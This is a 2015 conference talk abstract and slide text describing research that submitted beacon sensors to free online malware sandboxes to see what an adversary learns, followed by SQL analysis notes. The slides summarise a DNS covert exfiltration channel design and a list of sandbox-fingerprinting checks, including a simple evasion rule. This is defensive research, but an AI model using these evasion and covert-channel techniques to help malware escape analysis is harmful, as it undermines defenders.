Anyone attending this conference knows the usefulness of running malware in a sandbox to perform triage, speed security analysts' workflow, extract indicators of compromise (IOCs), and to gather useful information for detection and mitigation. When analysts do this, what are the OPSEC concerns regarding tipping the adversary off? Which sandbox providers are better than others in this regard? In this talk we will present some research on taking an adversarial view of the free and widely used SaaS malware sandboxes. When an adversary's malware is detonated in a sandbox, what network artifacts can they see? Can they determine which sandbox provider based on the network? How do malware and related IOCs submitted to these sandboxes propagate to security companies and ultimately threat intelligence feeds? In this talk, we will answer all these questions and more.
Scanning the Internet for External Cloud Exposures via SSL Certs
An Adversarial View of SaaS Malware Sandboxes
1. An Adversarial View of
SaaS Sandboxes
Jason Trost
Aaron Shelmire
Oct 17th 2015
2. whoami
Jason Trost
• VP of Threat Research @ ThreatStream
• Previously at Sandia, DoD, Booz Allen, Endgame Inc.
• Background in Big Data Analytics, Security Research, and Machine Learning
Aaron Shelmire
• Senior Threat Researcher @ ThreatStream
• Previously at CERT, Secure Works CTU-SO, CMU
• Background in Incident Response, Forensics, Security Research
3. • AV is Dead!
• Threat Intelligence Feeds
• You’re going to tip off the adversary!!!
• Everyone’s going to know I’m compromised
• Advanced Malware Detects Sandboxes!
Motivation
4. Experiment
• Created Sensors with unique CampaignIDs
• Encoded execution time and CampaignIDs in
domain names
• Tornado HTTP app and bind DNS servers
• Submitted to 29 free online Sandboxes
• Watched traffic roll in
8. Sensor C2 – HTTP POST
Exfil HTTP POST
zlib compression
base64 encoded
Worked pretty well, but…
9. Sensor C2 – DNS Covert Channel
Some Sandboxes block TCP conns
Most allow DNS unmodified
zlib compression
hex encode
split data into chunks
multiple DNS A requests
12. Eventually…
• VirusTotal: 6 Samples
• Detection ranges from 8/57 to 30/57
• A lot of Trojan Zusy and Trojan Graftor
• More malicious as time went on
13. Sharing?
• Yup, Lots
• Samples shared
• Evidence of new executions seen from different origins
• Domain names shared
• Previous execution’s domains resolved later by other orgs,
different nameservers
• Some domains appear on threat intel lists
• Many orgs are trivially identified as security
companies
• Every major AV company is represented in our DNS logs
• Several Security Product Companies
15. Threat Intel vs the Sandbox IPs?
• Of all the Sandbox IPs that made valid POST requests to our server 15 were
also identified in some threat intelligence feeds as malicious
• 6 were TOR IPs
• 1 was an Anonymous proxy
• All others were characterized:
• Bot IPs
• Spammer IPs
• Brute Force IPs
• Scanning IPs
• Compromised IPs (Hawkeye Keylogger, Dyre)
• Interesting, but not surprising
16. Tipping off the adversary
16
Monday
Morning
1st Submission
2nd Submission
DNS C2
17. Check In Activity
17
Trend Micro +
Home Hosts
Monday Morning –
Everyone checks in
Amazon + Google
DNS C2
20. Sandboxes detection features
• System Services Lists
• Processes – VBoxService(1), vmtools (8)
• MAC address
• VMware, Inc. (55), Cadmus Computer Systems (40), ASUSTek COMPUTER INC. (23)
• Bios
• VMware (50), Bochs(34), ASUS(23), Google(8), Qemu(8)
• Disk Size
• 19.99GB (52), 25GB (37), 120GB (28), 50GB (20), 39GB (20)
• RAM
• 1GB (92), 1.5GB (18), 512MB (10)
• Was the EXE renamed?
• sample.exe, malware.exe, ${md5}.exe
21. Way too Advanced!!!!
- Virtual Machine Sharing
• Many companies, but only a few virtual machines used!
• Same usernames
• Same hostnames
• Same disk size
• Same CPU count
• Generic detection that 90% works:
• ( CPU Count == 1 or Disk Size <= 60 GB ) or no running Web Browser
22. Lessons
• Most people use the same Sandbox Images
• AV thinks your file is malicious
• You will tip off the adversary
• Everyone will hit their network touch points … forever …
• Malware sandboxes can be fingerprinted with simple techniques
• You get what you pay for
23. Contact
Jason Trost
• @jason_trost
• jason [dot] trost [AT] threatstream [dot] com
Aaron Shelmire
• @Ashelmire
• aaron[dot] shelmire [AT] threatstream [dot] com
Editor's Notes
select timestamp::DATE, campaign_id, org, COUNT(1) from network_activity where host ILIKE '%.x.vpnlogin-it-helpdesk.com' group by 1,2,3 order by 3,1, 2;
these 3 domains were associated with 3 different campaigns (data sharing is obvious here)
3 domains associated with this project showed up on commercial threat intelligence feeds.
None of the file hashes showed up.
select data_parsed->'bios'->>'manufacturer', COUNT(1) from c2_logs c where data_parsed::TEXT != '{}' and (data_parsed->>'username'::TEXT) IS NOT NULL group by 1 order by 2;
select (data_parsed->>'ram')::INTEGER/1024 as RAM, COUNT(1) from c2_logs c JOIN ip_metadata m ON(c.client_ip=m.ip) where data_parsed::TEXT != '{}' and (data_parsed->>'username'::TEXT) IS NOT NULL AND (data_parsed->>'ram')::INTEGER > 0 group by 1 order by 2;
# joined with http://standards-oui.ieee.org/oui.txt
select SUBSTR(data_parsed->>'mac_addr', 0, 9), COUNT(1) from c2_logs c JOIN ip_metadata m ON(c.client_ip=m.ip) where data_parsed::TEXT != '{}' and (data_parsed->>'username'::TEXT) IS NOT NULL AND campaign_id NOT IN ('TEST', 'JT', 'OG') group by 1 order by 2;